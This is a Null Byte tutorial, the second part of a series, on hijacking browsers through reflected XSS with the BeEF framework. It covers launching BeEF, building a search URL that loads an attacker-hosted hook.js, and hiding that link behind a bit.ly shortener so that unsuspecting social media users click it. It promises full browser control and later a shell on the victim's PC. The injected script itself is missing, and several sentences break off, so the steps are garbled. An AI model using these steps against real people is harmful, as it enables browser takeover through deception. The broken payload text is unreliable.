Wonder How ToGadget HacksNext RealityNull Byte
how to

Exploiting XSS with BeEF: Part 2

May 7, 2015 11:49 AM
Jun 23, 2015 04:39 PM
635665692610316636.jpg

Now that we have our vulnerable server, it's time to start up BeEF.

Getting Started

Step 1: Running BeEF

If you have Kali, BeEf comes pre-installed. You can find it in /usr/share/beef-xss/. Once you're there, type ./beef to execute the program.

635665686945944010.jpg

You will need to know both of these addresses. The top one is for the browser-grabbing JavaScript file, and the second one is for accessing the web UI.

Step 2: Getting into the UI

Once you have run BeEF, you can access the web UI through your browser. Type http://your_ip:3000/ui/panel and you will be redirected to the login page.

635665689754223252.jpg

The default credentials are beef for both the username and password. After logging in, you will be presented with the start/help screen.

635665691349848051.jpg

Exploiting

Step 1: Build the Malicious Code

Remember that line of text from the terminal earlier? That's the location of our malicious JS code. For me, it's http://10.0.2.13:3000/hook.js .

Since we want this to be run as code, we will implement this with the

Step 2: Making the URL

Let's go back to when we searched for something. When we did, we had a part of the URL ...?query=lorem+ipsum. This is the part of the URL that tells the website what is being searched. By using XSS, we can take this even further to run pretty much whatever we want. When we build our url, it should look like http://victimsite.com/search.asp?query=

When the victim visits this website, it automatically "searches" for whatever is put behind the query=. But because we have a script, it will be run as a script instead of a search.

Step 3: Sending to a Victim

In order to "hook" their browser, we need to send them this link. But of course, this might seem suspicious to the average user. But if we were to use a URL shortener like bit.ly, it would be hidden, and more people would click on it on social media.

Most websites that allow you to share articles/videos, etc. automatically include a bit.ly link in the message. If you were to share this bit.ly link on Twitter, no one will think of it being malicious.

http://bit.ly/1EjY8Tq

Doesn't that look much better than http://victimsite.com/search.asp?query=? I think so.

Step 4: Done!

Once someone clicks on that innocent-looking link, you will have complete control over their browser! If you are attacking over WAN, don't forget to port forward.

Next Time...

In my next article, I will be explaining how to get a persistent connection with BeEF, including how to get a shell on the victim PC.

C|H of C3

Related Articles

637263493835297420.jpg

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)
636455706472146367.jpg

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist

Be the first, drop a comment!